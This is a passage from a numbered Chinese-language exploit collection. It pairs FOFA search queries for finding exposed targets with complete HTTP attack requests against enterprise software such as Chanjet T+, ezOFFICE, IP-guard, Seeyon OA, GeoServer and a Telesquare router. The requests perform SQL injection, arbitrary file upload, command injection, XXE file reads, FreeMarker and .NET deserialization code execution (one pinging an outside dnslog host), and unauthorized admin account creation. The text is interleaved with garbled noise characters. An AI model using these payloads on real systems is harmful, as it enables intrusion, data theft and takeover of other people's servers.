! y' Z" B4 n, @ U2 S) H' q8 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36- Y5 k. X0 x8 X; A$ M- }3 t1 r+ z, z
Content-Type: application/json& f6 g5 q1 b0 B5 I
9 l8 x7 \7 ?7 o
{
3 |& Q. y0 H/ h" h7 V+ ? "storeID":{
4 T# Y2 J1 V8 g: b" W" w0 ` "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
6 O" D5 h6 p- d5 T( r/ W6 M. T' R "MethodName":"Start",4 @1 W" Q7 f# k* O& X( @
"ObjectInstance":{
k) E8 k# C5 {8 N* Y0 [2 A- B "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
) t& n" L8 [% i h "StartInfo": {* L" {6 f ^! ~2 J: _. v, o3 x
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
- V7 Z+ S- J8 Z "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"6 S" h/ q/ S! a6 @/ M5 z9 N
}2 P# J9 M1 |7 Y" P4 V
}0 E4 X* G8 Z* p7 N" i+ {. t/ d' ]
}
$ X+ F! l; \. D8 _" B# f% s}
: _+ Q2 Z0 D' r5 p
* U% W m) n) v' o0 z
! z1 n; M7 C. E/ c% Y57. 畅捷通T+ keyEdit.aspx SQL注入
1 C2 s' k9 S- R- T5 J" ^. @, pFOFA:app="畅捷通-TPlus"
. o/ M- N. \) k W' X6 k G8 u1 pGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
6 w' L& C* R2 h& b# YHost: host
2 s8 B2 Z2 R5 d- P5 o3 d4 K7 BUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36# d+ v' E& r8 _7 z' G3 k2 E3 V) w
Accept-Charset: utf-8
9 j3 |" V# x, ~, w$ bAccept-Encoding: gzip, deflate7 @1 S" G9 D* v2 B
Connection: close% C# \" [4 F6 C+ q/ P
6 z! O3 C6 X6 }4 V: n* y7 K# d; Z( o I
58. 畅捷通T+ KeyInfoList.aspx sql注入
; ~! G( L# J: t/ r0 ^FOFA:app="畅捷通-TPlus"
9 Z; V/ X; _; k. W) b: NGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
3 _2 n9 `7 K2 F6 j" {Host: your-ip7 u" c) B$ D2 v" G/ s: V5 k' h
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
1 i( N8 o9 t0 U f. iAccept-Charset: utf-8; J( {, y( D# j8 y3 y% ^
Accept-Encoding: gzip, deflate
7 B, r: g+ R- M2 G0 G! wConnection: close
) O, C5 Z' j1 A" P/ `5 v* A9 V m. S% n# K8 C/ C5 n7 Y
4 K- B7 U$ Z& M
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行. A& L/ ]2 E9 c+ w
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"4 Y0 ]; W0 q* o, y Q
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1' g6 u8 g$ r: F5 G/ b# t# t y. d R
Host: 192.168.86.128:9090
" d' N% I( l* o, h5 E) _7 }6 wUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
7 f6 q' g+ ^. |& s7 q! {Connection: close
: F3 Z; |7 f+ w8 o5 |$ [7 A" ], dContent-Length: 1669
, x2 p& e0 \1 h. R$ @1 Q* uAccept: */*
, p. @& @# |3 K, [1 b4 z( jAccept-Language: en @! q1 [% H; C! H w: I" x0 N
Content-Type: application/x-www-form-urlencoded
* ]# u* \8 Q, b4 ?' OAccept-Encoding: gzip
7 R7 y, `8 Z# x8 ^2 w
. t: Q: j0 Y# P8 f# PPAYLOAD# T1 |. n/ _4 O6 r0 L9 Z
3 }$ q, P2 X; N( ]. |
1 c# M) s. g. ?# _" l60. 百卓Smart管理平台 importexport.php SQL注入
! s9 M' V" H s) r; ZFOFA:title="Smart管理平台"; h4 \0 r+ P6 L
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
( s! k: w7 a# k$ CHost:
: K8 R1 K$ O$ l3 v5 ?8 E" s5 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 t6 S$ i/ h9 p; R* b* \8 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ N8 @6 ?6 Z% ^& h: h, f' I8 uAccept-Encoding: gzip, deflate- @3 ~+ W/ N, u# ~3 [0 d8 s% x
Accept-Language: zh-CN,zh;q=0.9% [- q9 Y: Z g" k) b: k
Connection: close
# g; l. n/ ^: _! k8 O! j6 [( L b. }+ m- J6 V
* y' P8 V" E1 @ E3 G: ]$ c
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传6 P1 |& G: g) s) t7 h6 U: w
FOFA: title="欢迎使用浙大恩特客户资源管理系统"7 [5 ^+ t! m( r# W4 ]
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.13 c5 f' r* V# z4 \; J
Host: x.x.x.x: \1 O9 @. [1 q( [% E: _; o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 C5 b' C9 B$ {5 a
Connection: close$ o. ], R- U8 Z+ m- w
Content-Length: 27
9 N" h. ]- D8 F6 C; ]Accept: */*
2 n4 H3 e* T# Z8 D) NAccept-Encoding: gzip, deflate x1 n g! J8 G8 h' O
Accept-Language: en
, q) S B0 B8 W: |0 gContent-Type: application/x-www-form-urlencoded$ @& R7 @) R: l* {/ ?; r
9 q) ] P( l6 }, y: N! m6 }5 a
8uxssX66eqrqtKObcVa0kid98xa2 h1 ~1 [& E# d. D6 R3 S1 b5 H5 U
: r& p* w2 v1 a, [4 X
1 P7 |: ]6 V% ?7 w, v- s5 ~& _% \2 z62. IP-guard WebServer 远程命令执行2 O/ }/ J- N' W" Q% |& d0 E# n) m
FOFA:"IP-guard" && icon_hash="2030860561"2 d5 W& g4 Q' d3 [# c* M
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
9 l [, ]/ e* P K0 \( YHost: x.x.x.x
; `; X/ ?' a1 l: Z) _User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
8 ~3 _1 g, z5 S) o# V" A+ b5 AConnection: close4 \2 Y9 s, D4 W% s8 ^5 M
Accept: */* j# H# |* y7 v$ n+ O8 v
Accept-Language: en
0 a% @3 c' h* s9 w( @6 _Accept-Encoding: gzip
) i% R# d# z7 R# @3 G/ }* x/ y) [6 ^, ]/ {; f
% A& p! ^/ Y* Z0 q E访问
9 f$ b* K; B# f
8 Y- K% m; ^8 [' G& oGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
2 F( k7 J1 M+ R$ y+ w. Z' n+ A/ BHost: x.x.x.x0 s- U4 w7 S% G
1 h4 g! W7 ~8 J# |% D+ c
* N! u4 @1 m b8 p" t) W63. IP-guard WebServer任意文件读取
9 l5 @7 C8 p9 }5 FIP-guard < 4.82.0609.0
0 H5 w: l5 ~2 c: p5 ?8 N" ZFOFA:icon_hash="2030860561"
" q' i3 p, D- o$ ?POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.15 r7 s$ \) A K) K, _; A' M
Host: your-ip
) b% e7 Z. P9 [6 b; Z& OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
: B# M: S% r( Y9 N9 ?. H9 eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) {/ [3 _! f8 CAccept-Encoding: gzip, deflate! D& h3 E' E9 X/ m3 s0 l' x! j
Accept-Language: zh-CN,zh;q=0.98 u7 O2 u& g/ R7 p; a& \% P6 u
Connection: close/ B+ h' G8 K# ~- ^1 Y
Content-Type: application/x-www-form-urlencoded
7 E/ P) _) L% C7 |0 u" t( ]1 W" L# j, M" s/ _
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A+ `0 | ]$ p- R7 \' n. w) I# o
3 _7 [3 N" P* W
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
/ d A% h( b; ]6 MFOFA:body="/Scripts/EnjoyMsg.js"
2 x6 t& r6 ?# O& }; W1 F. tPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1% Q. N3 _3 g# ^9 ^9 P" {
Host: 192.168.86.128:9001/ d: R1 Y6 ?+ x( s
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36% `$ H8 d- L# K* {
Connection: close
4 a- H! ^- s1 l1 T& E DContent-Length: 369
+ }. W2 i" Q. W- J, i/ V' `5 CAccept: */*
4 ?! h9 J4 H% x' m- ]- OAccept-Language: en I: R0 j& H# `: q, f3 U
Content-Type: text/xml; charset=utf-8
8 }3 h. U9 Q' F3 I5 q8 o; sAccept-Encoding: gzip% v, n: R: `+ m0 z7 u
* Z4 F1 ^7 T+ O$ w
<?xml version="1.0" encoding="utf-8"?>
, k0 O5 ]% L, S+ [+ l<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> ^$ H, z% h% T, M' v8 n8 M6 h
<soap:Body>- C6 R3 v+ X# F3 E4 L6 m: C
<GetOSpById xmlns="http://tempuri.org/">
1 w: W6 e2 Q7 v7 }0 z5 q" q: x' Q* Y& i1 O <sId>1';waitfor delay '0:0:5'--+</sId>0 H% l4 \7 D4 e: M0 c3 q+ |6 k
</GetOSpById>
" V" W9 F |- u, {" K* a/ S# _0 | </soap:Body>1 F/ q% I! |. ?" m1 d2 H" H
</soap:Envelope>
4 j" J2 I8 F9 R" q0 F' R0 q- D0 m3 ^
# O. `' ?) a; u+ W4 R
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
: r3 c7 U# V8 NFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
% n N# e# L Z. ?响应200即成功创建账号test123456/123456# z/ B- n, g& A* r
POST /SystemMng.ashx HTTP/1.1
5 z# d, }, m8 y. cHost:5 A' X' ]5 M! }' j
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+ p$ }$ X2 F" H- g+ q5 }) FAccept-Encoding: gzip, deflate
8 w) d- d7 f& }% _6 _Accept: */*
O! a; }( }+ pConnection: close
. n2 c3 D/ Q; I4 X' S9 gAccept-Language: en9 o5 ?: Y- \5 z3 \
Content-Length: 174
5 D8 M8 K' K8 }& _+ I( f0 O: e+ C. q1 P# c. O0 f; G% D
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
/ r/ C; n3 ^: N; [7 ^" v, U8 O
1 H9 `/ t) Z3 q0 a+ d- K& M7 G. |
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
: l% v* G+ M) E! P# m) G5 UFOFA:app="万户ezOFFICE协同管理平台"
7 n$ ^+ ^6 M3 j7 `* U) T' W8 }1 E1 W- b& P' U: h; B) J: }
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1. d% u3 q2 s X7 R; X/ D
Host: x.x.x.x1 p5 ~ t* A+ i+ P2 N+ ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
. |7 S7 K% ~$ P% O( wConnection: close! X0 b3 c0 n0 z* D: N% _
Accept: */*/ o/ k; U. B' M: T3 e$ ] O
Accept-Language: en" L0 g( P" a* u: p/ _# ]# n
Accept-Encoding: gzip( W. }" G* O+ R) U3 e; G5 m3 n
5 j; j& K1 p) Y
8 k& g6 o% Z C5 w3 f9 a第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在" m6 P; j$ _6 d: d, b( t
0 B, N2 M+ U, d
67. 万户ezOFFICE wpsservlet任意文件上传
6 Q5 ^$ ~. q: A; W7 b2 @- MFOFA:app="万户网络-ezOFFICE"' r& W; O% D9 |; D4 \
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型' R) N: R# K) e: u
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
0 S: Q! k6 m, {# |Host: x.x.x.x& u& z6 G3 V. a0 k3 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.09 l; {* X, w6 i$ [4 x
Content-Length: 173+ k1 w& k& p) T+ }6 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
/ r- f9 s8 U5 ]$ ^: n; S; w: TAccept-Encoding: gzip, deflate
" l- D8 C% z, h" j) R3 VAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.30 G$ g i2 G* U. R
Connection: close
, m' v6 w* R8 m, M) bContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
3 W( v ]) P; B& a. f6 S; I3 LDNT: 1( W4 u# ]* a4 R: ]( ?& {
Upgrade-Insecure-Requests: 1
: K, Y! i& _- l, b2 m/ C
7 v5 C" k' S$ s--ufuadpxathqvxfqnuyuqaozvseiueerp
1 X5 L' ^: ?. m' DContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"7 `' N) Z! I; R8 h
+ F2 o* }9 w2 m$ {<% out.print("sasdfghjkj");%>
* f9 ]4 z& E1 e: L2 c--ufuadpxathqvxfqnuyuqaozvseiueerp--
! J$ Z" Y$ x* X: v) M
( G8 }1 C4 _% @, z. a/ i
+ a9 t- h/ s4 w) }文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp! J: ~# C5 T6 K6 \8 g
/ s/ F! p* \1 p7 q' k" G
68. 万户ezOFFICE wf_printnum.jsp SQL注入
9 q. V) ?8 K% oFOFA:app="万户ezOFFICE协同管理平台"
1 l8 M) { N, a3 M4 {" lGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.15 {$ |3 Y! }) ~) [2 F
Host: {{host}}
. E0 Z; I0 ?$ y- o0 o0 {' I6 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36& U: \+ D3 t( X! ~. \( x: D% R
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8# S0 y! ]9 t' K2 X* A
Accept-Encoding: gzip, deflate* t+ V3 @6 u' s7 p
Accept-Language: zh-CN,zh;q=0.9
& ?. e. d8 X4 o9 O" Z. h1 nConnection: close
! |" \7 i) d& U9 |+ N6 K. u2 [; g7 z, ~
' G/ p$ B- `% u) e' G
69. 万户 ezOFFICE contract_gd.jsp SQL注入
1 n, ?; D' v- @; g7 M# {, kFOFA:app="万户ezOFFICE协同管理平台"2 H" u" h5 k# C5 w$ Z
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
, C5 U0 e$ h2 C' X' F/ PHost: your-ip
4 ]( k' I5 \. M# C- F7 [ \ yUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
) i/ D+ F$ Z6 A% [) QAccept-Encoding: gzip, deflate
; A* _$ K% n g3 aAccept: */*. o6 s) m8 n# P) b* \ \
Connection: keep-alive" f' m% K/ U/ F4 c7 P/ |" w- E
2 K4 X8 m' z0 U' ^; K+ Z* U
+ L8 I+ Q8 Y) t, f
70. 万户ezEIP success 命令执行
1 s9 {$ Q$ H0 d# ?& _5 xFOFA:app="万户网络-ezEIP"
1 X1 F% {; q+ a+ v4 vPOST /member/success.aspx HTTP/1.1
/ v; V; [9 k; t9 M7 u: gHost: {{Hostname}}
8 ]+ y/ f8 {; ?6 J k" x" `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
. h, c5 i( I' V) PSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=( B: G4 X- I5 L+ A4 }* o) } C" l
Content-Type: application/x-www-form-urlencoded; V" ^+ J5 H2 ]. u& P9 o
TYPE: C" ?8 O! P0 E: T; C# q7 y9 C
Content-Length: 16702! s' N8 l, W- l3 y$ A0 Z
# |4 V1 Q8 V3 }% V, f__VIEWSTATE=PAYLOAD
9 o0 G- {( c! ^6 {$ U4 z/ w2 A- t d) o/ ^
2 @7 i# x5 r9 }. X. t% z. d6 ?71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入! L' t A I- e
FOFA:body="PM2项目管理系统BS版增强工具.zip"7 G( U' o/ H! N9 r$ A
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.12 l5 R" G4 R9 E& a4 q# M
Host: x.x.x.xx.x.x.x
4 l8 {/ T1 U0 w# X0 f' C+ jUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36, K2 ^7 w) N* R( F# ~# F
Connection: close
4 X; F" j. ~1 ?4 B( VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 g- J0 ]& |/ d7 N
Accept-Encoding: gzip, deflate
; I! S6 O/ ^# ^6 _1 _2 u; G( mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 J% H# x1 Q5 Z+ v
Upgrade-Insecure-Requests: 1
, M% p9 p4 @9 g8 U2 e" m7 A1 ?6 ]3 ]- ^" q
! s- o2 I' Y6 C2 v. O
72. 致远OA getAjaxDataServlet XXE
/ {8 x4 D& j, z- L, NFOFA:app="致远互联-OA"
4 Y, }6 X7 l" i: n NPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.16 S' `1 y: K0 @" ~3 e0 M
Host: 192.168.40.131:8099
( h( W, Z$ s8 q: LUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
) L; R. t, _$ T: g* \Connection: close
1 t; ~& q! |8 f, I+ e. O5 eContent-Length: 583 O- i. E! }6 h9 b0 `
Content-Type: application/x-www-form-urlencoded+ ]# [! d2 R( u% E
Accept-Encoding: gzip& f y2 |2 d& b) D3 A% h
/ Y# V0 C6 z5 h7 n8 u# W% O
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E) @( g. @8 b0 X0 P2 V- i
) d7 _0 K, A7 z4 K/ P3 B5 Z
( Y; [4 Z9 n6 E1 ^% P# a# h73. GeoServer wms远程代码执行" R- F1 |" c) b) q W; B
FOFA:icon_hash=”97540678”
) I& F% J' Y1 ZPOST /geoserver/wms HTTP/1.1
8 `" U, w5 C: e8 B. J& [. K$ DHost:, S, Y) X8 g) n7 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 b0 d% X# Z f, j5 ~! b
Content-Length: 19815 z) c; I) n2 p6 i
Accept-Encoding: gzip, deflate1 t8 N7 Q( c' v* X6 t
Connection: close6 s' L$ }6 D+ F+ Z7 l6 _
Content-Type: application/xml* [0 p& W% q4 u1 D2 T$ E% r g
SL-CE-SUID: 3
% b- y" N. E3 E4 d" ?) p R7 P% N' b- Q6 B# U P: X" F( \
PAYLOAD
& _: n5 b, ] z5 K0 t- `
; ?3 J6 n8 Z, U: Y4 U! n* G2 w3 o! ` `4 u1 k3 d2 ^. h
74. 致远M3-server 6_1sp1 反序列化RCE
/ I2 |( }) }* W. r3 Q9 rFOFA:title="M3-Server"
5 V; D+ o9 A. R8 t- t: N0 {PAYLOAD! s" J# q3 x/ {; s4 x" C
. V& d/ c( X1 \7 b
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE& k! \, n% ^' U: T8 s# {/ }! r
FOFA:app="TELESQUARE-TLR-2005KSH"
( }9 ?; W& L( i" z( x' {( HGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1; u$ _+ s' M# v% k& p
Host: x.x.x.x' I' W4 b% H' e" \9 H5 u# s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 _. C z- N% gConnection: close/ Y8 u. p1 ?/ Y* s( l
Accept: */*
+ `2 N. [- ?0 F O0 F V, I' ?Accept-Language: en
$ l! G9 }$ S" A! a: t2 K. BAccept-Encoding: gzip+ p2 N1 N. q3 E5 O
0 p- I/ G0 f( A9 L) m
3 G1 v' T* X+ ~GET /cgi-bin/test28256.txt HTTP/1.1
E: {* l# Z, {* ^* X; ^Host: x.x.x.x
3 Q! {$ }7 o( y# P
$ z6 p& _ j/ S- {1 A D& [. K! K' |% m$ W/ S" s6 ?
76. 新开普掌上校园服务管理平台service.action远程命令执行
. U; B0 |+ {- y( N, K- b+ W# I4 aFOFA:title="掌上校园服务管理平台"
$ g4 [5 _) b* T4 z1 f5 rPOST /service_transport/service.action HTTP/1.1; h$ W' W( \7 C# }! j- S+ {( l
Host: x.x.x.x& o) g/ |0 b, h) n/ k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0* ^7 U: t. s9 w
Connection: close3 m+ j; h! S& j
Content-Length: 211% Z7 S. e, U. h5 G+ e% j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 U/ c0 Z7 B, |! z, H
Accept-Encoding: gzip, deflate6 @0 L6 j; U8 W0 G3 l& r! [0 t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 [7 b6 |! X7 k) _1 ~1 O' n; n
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
# V! }% P& |; N2 O9 w, SUpgrade-Insecure-Requests: 1
4 E8 e9 f' [% [" C, k3 h8 f( x. s0 v% ^
{9 v$ {* S% `, ^* F
"command": "GetFZinfo",, j) ~: r: @* t! i/ N3 m
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"+ [, f2 I9 o5 d) O6 n+ o) F; S
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
4 Q2 i6 ~+ p5 c0 q* |3 q* `0 ]( `$ a}
2 U E9 d0 A- l3 r
) p; K m+ r. w: ~* N6 q: j5 c9 z# {3 d7 L# B& L0 C( J
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.12 x/ U1 Q. i- W3 ` A4 _# x
Host: x.x.x.x
: b* w2 p. `/ n& |3 f6 Q( _1 ]. D2 b3 s8 ?
# L% n: b6 Z' c& a
+ U3 P( o% \1 S77. F22服装管理软件系统UploadHandler.ashx任意文件上传
% q) D, W+ z: YFOFA:body="F22WEB登陆"
+ h+ |8 H; ]& i0 |8 p8 l2 D6 P* ~POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1, j, r$ Y# L4 }! ?
Host: x.x.x.x
; k; Z6 i- c. J: MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+ R6 ~0 y- Q6 j: X' u! UConnection: close
1 T$ o: A: H6 i6 d. SContent-Length: 433
# h2 A: U3 V& S h8 F1 S# oAccept: */*2 W1 h% w8 V2 _. a1 s( v
Accept-Encoding: gzip, deflate
9 n# _$ U: E1 T& e, Q. i9 U9 Y9 DAccept-Language: zh-CN,zh;q=0.9
0 S1 k. _8 l, j1 jContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
- v/ S; ]: u; J2 Z
. T' o+ y) y' Y4 D6 [------------398jnjVTTlDVXHlE7yYnfwBoix: [" m, I0 T; U; g) z
Content-Disposition: form-data; name="folder" z. X' ?1 n3 @4 A9 e
. n4 `' }& S) j7 n
/upload/udplog/ d' E- p( r7 I. V( }! E
------------398jnjVTTlDVXHlE7yYnfwBoix2 U0 ]# P- C) n
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"0 P$ t7 E+ P6 O4 J- C
Content-Type: application/octet-stream
; ~( R- t3 E3 d" A" s. ^1 N8 r0 }
hello12345678 s2 ?- d7 u/ U) e/ Z! v* ?
------------398jnjVTTlDVXHlE7yYnfwBoix6 V% h4 Q J6 y. a
Content-Disposition: form-data; name="Upload"
) g/ x; n: [3 v! e5 S
# C; H/ F) j) v1 c8 ISubmit Query: P4 s% T) H1 U J; H5 W5 d% E
------------398jnjVTTlDVXHlE7yYnfwBoix--. c- \0 ~& M V0 [% k4 r: f" A
* l- ]. Q1 b+ o
7 F8 O, V# ?1 y
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传! s7 k9 n9 `+ h% X! _' U& p
FOFA:icon_hash="2001627082"
2 Q" X- b7 D) ?; o" aPOST /Platform/System/FileUpload.ashx HTTP/1.1: V% w& E* ^) I
Host: x.x.x.x
/ n, g E3 j8 z' o0 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ {3 ~# ?# ?' R. E/ Q9 l' M/ N7 S" cConnection: close: I8 p; S9 \3 C9 ?
Content-Length: 336; h* b1 A/ A3 f8 m4 O, s4 H4 \5 }
Accept-Encoding: gzip- d9 ]* {" P" N$ C9 w8 X% K+ T
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l7 T1 J2 I0 _* C! A1 B/ v0 A. \+ {
5 c1 @$ k6 p* J7 T( ^% _; g------YsOxWxSvj1KyZow1PTsh98fdu6l% l; S& o& Y' ^# L' A
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"4 J- `" ?" R7 Q# G9 x& G
Content-Type: image/png
' p/ \; L4 W0 H/ M0 e; `0 B
" T ?, d$ U3 q$ j9 y' fYsOxWxSvj1KyZow1PTsh98fdu6l' W( w6 v# K) r
------YsOxWxSvj1KyZow1PTsh98fdu6l
! D- v D) `- _4 c6 _7 b8 eContent-Disposition: form-data; name="target"
% A( N' ~" o6 v
